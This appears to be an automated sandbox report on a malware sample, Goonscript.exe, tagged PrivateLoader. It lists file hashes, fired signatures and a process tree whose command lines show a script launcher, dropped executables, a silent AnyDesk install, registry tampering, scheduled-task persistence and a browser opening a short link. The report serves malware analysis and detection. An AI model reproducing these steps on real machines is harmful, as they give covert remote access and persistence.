SHA256 09374b02e53608e82443959b9d2439a3a94a75cc87e72b8a4e844aa55ad9e1a3
SHA512 2beb608ad996a8d279c324d659ebb45e462d2f5fbf718ab26ef0e4a61d9f9da11d63182d847445c148b9aeafe59051a12ee7c42f63635db71bf95399773c0196

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 8d951d301a4c405355fe3a0b42013c4a
SHA1 7d91685d8989ec63a154e5692ad8f57297d09a7f
SHA256 343f89d4e0138b5644db6aebcc26b2d1269c15b3dfdf1393c1d6796d3055914f
SHA512 3636ea7fdb169b69a1a4f988ab4f782d573cadb0fac2a30bf88b6634e5e10a73750cf7613b8324ee9ab0bdba4b7200ba48dbea3a0e546ed4497b6c60490ef3d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a0e749e19399649e099feeefc72239d8
SHA1 b706509aaf2409dfdf2899eb749ace148fab7445
SHA256 8e4e872521f30f1efb2edc5fc6ae9e1056837d237b42bcf2923bd9b66eff9a7c
SHA512 bf0343385b2fa395c7176e58b21b93c7b61eb9fd3b57effc73b01cd2804d8ec65e0d61730fd95a9ec917c73efe6968c94c800e05d1d3fc0e4833742c9765dfa6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d05c3756dfb6fddc1b587bef8f7d4d0
SHA1 6c1349b0572477e5db36323b6bb2ff3ad811ac94
SHA256 0f1329d586f786f15cd9df273ee5e15863507358c2bc3c7b78ba0ba2ad2c6c06
SHA512 0ba5c5021239b47978f30599c43c985566d5f1bd0e6f1c7f2f59edb4e814cc8a17a2bb2a90633e98e6445093918ea9f76800e8523edfa1385cd39b1a729cdce1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bc316bb81383ca854335167818bc667b
SHA1 06eafe4f80e101a30567cc5c8cf486ad256178c1
SHA256 12563580b9734140f377609581b8a0f423f2c7f6f9d72e3cdf8c6e2f3fc90ee0
SHA512 b43c977ea8182327d9b3d42f501c8f39de508405ccc1c43ef9e4cb97a8ba075b608b4a26043d7b43ac900506a00dd834cdd731a04f642aed7cfa92bd07f4bed9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ec32abff877c551f010f4e14a3cdafb
SHA1 9fd1fee5923dbb9c433b4729c5d3852899389aa4
SHA256 168f117332fdf53566d60cf48718ecdef9aa2d064fe54ed3f1eca9683424278a
SHA512 310b557abe60beff8ecd068198526cfcf0b8f0a46e27511e19ccf2ccb85b402869ef90771dce9bf9bd13c5b20d0c8235fa70d3760aeb54d53ae890d81ecadb77

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 304ac5b2bfdebebaa620c4c75e06a809
SHA1 ec92ada3de18ff4200512d72c52de905dca46efe
SHA256 796f37df70eeae925550961ae8a8d44181e1d319e0935edc665121e127156c9c
SHA512 06046386c8edf9d184b0d9bbdf1b4561444ae8bae954baa207f4401d7e1d91f98ce8a96c596f5a13b6bcb0764e0226bbc0e1cb8b9b99c58bb050056831f1de02

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5d4694d5ae83bc3932abf5a3dc4854c
SHA1 34f7757aa1bc0da8be8d8450c098db9c85df3498
SHA256 2c3cf4b2d6a10b5ef48190d914938bc051efcb46e85ef47687888ba3c3f5b156
SHA512 311e22492fe78268d6549e628c79e9d9468ef1affb7143019ae5537bf2be82fc0f947510aac85df8292a92046ac68e2f442c8817956ae4333913b15599fcdf75

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 d357b725d05a638484e8b492600e197b
SHA1 83244ef16a0d6471cd811eb15f2843118c596bfd
SHA256 3d1eaac1f6b2d1425909e0c38968009d4c9de9de6abce939d06e4e12491e0fa8
SHA512 4db32e851aca535d9520a04b3b95721ad897fa2093baca8c76c76972cc43fbc747ef12870904d31fd7aa4c62283ca45bb8944c20ca7fe648f412a9cbb5b9ca6e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f42ac14cee5dc409f20b2e50a7909ad7
SHA1 af30f9a96a61c7f5df3275b3e8da440dc9ce499d
SHA256 37f99855cb765f4b9ff8aee8664d581681f56d424f3d6bc6e76d53ea1f4f743b
SHA512 4c74ee2a57f14aaea0cfbad801b1fdeb8c7b0f9737d2ac60148c49c33afc35e7b231293470863735787ed7cf3bb68df61b74107652f10c51fb17bb2284b833dc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b55da9f2032ffb0f9e9950abc7fb7ba7
SHA1 62917a7d99ec6c71ee42b8214f57602db71131c1
SHA256 2ce119f66793101ba85ef9d3e03ee78f0f12c2f121edbd591057a7d1cec589ac
SHA512 52711bc437b7e61096f10ec409b250e7d59a7bc5106af32cff912a37fd0c353dd1bf4a1aeb9938772c2406984be6cc8eb0f61fab724a41e5ba19eef55756bd94

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 18:38

Reported

2024-05-09 18:40

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

Signatures

PrivateLoader

loader privateloader

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Goonscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\doorbell-sys.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\locked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\ProgramData\AnyDesk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\AnyDesk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\AnyDesk.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 3904 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Goonscript.exe C:\Windows\system32\wscript.exe
PID 3808 wrote to memory of 3304 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 3808 wrote to memory of 3304 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
PID 3304 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Roaming\doorbell-sys.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 2880 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 1164 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 4348 wrote to memory of 4700 N/A \??\c:\users\Admin\downloads\AnyDesk.exe \??\c:\users\Admin\downloads\AnyDesk.exe
PID 3808 wrote to memory of 4940 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3808 wrote to memory of 4940 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 5616 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 3808 wrote to memory of 5848 N/A C:\Windows\system32\wscript.exe C:\Program Files\VideoLAN\VLC\vlc.exe
PID 3808 wrote to memory of 5848 N/A C:\Windows\system32\wscript.exe C:\Program Files\VideoLAN\VLC\vlc.exe
PID 3808 wrote to memory of 3832 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3808 wrote to memory of 3832 N/A C:\Windows\system32\wscript.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2880 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 2880 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\ProgramData\AnyDesk.exe
PID 3808 wrote to memory of 5432 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\locked.exe
PID 3808 wrote to memory of 5432 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Roaming\locked.exe
PID 5432 wrote to memory of 6124 N/A C:\Users\Admin\AppData\Roaming\locked.exe C:\Windows\system32\cmd.exe
PID 5432 wrote to memory of 6124 N/A C:\Users\Admin\AppData\Roaming\locked.exe C:\Windows\system32\cmd.exe
PID 6124 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 6124 wrote to memory of 5412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2880 wrote to memory of 5488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 5488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\sihclient.exe
PID 6124 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\sihclient.exe
PID 6124 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 3768 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 3972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2880 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6124 wrote to memory of 5496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 5620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 6136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 6124 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Goonscript.exe

"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs //Nologo

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-service

\??\c:\users\Admin\downloads\AnyDesk.exe

"c:\users\Admin\downloads\AnyDesk.exe" --local-control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4908,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5344,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5588,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

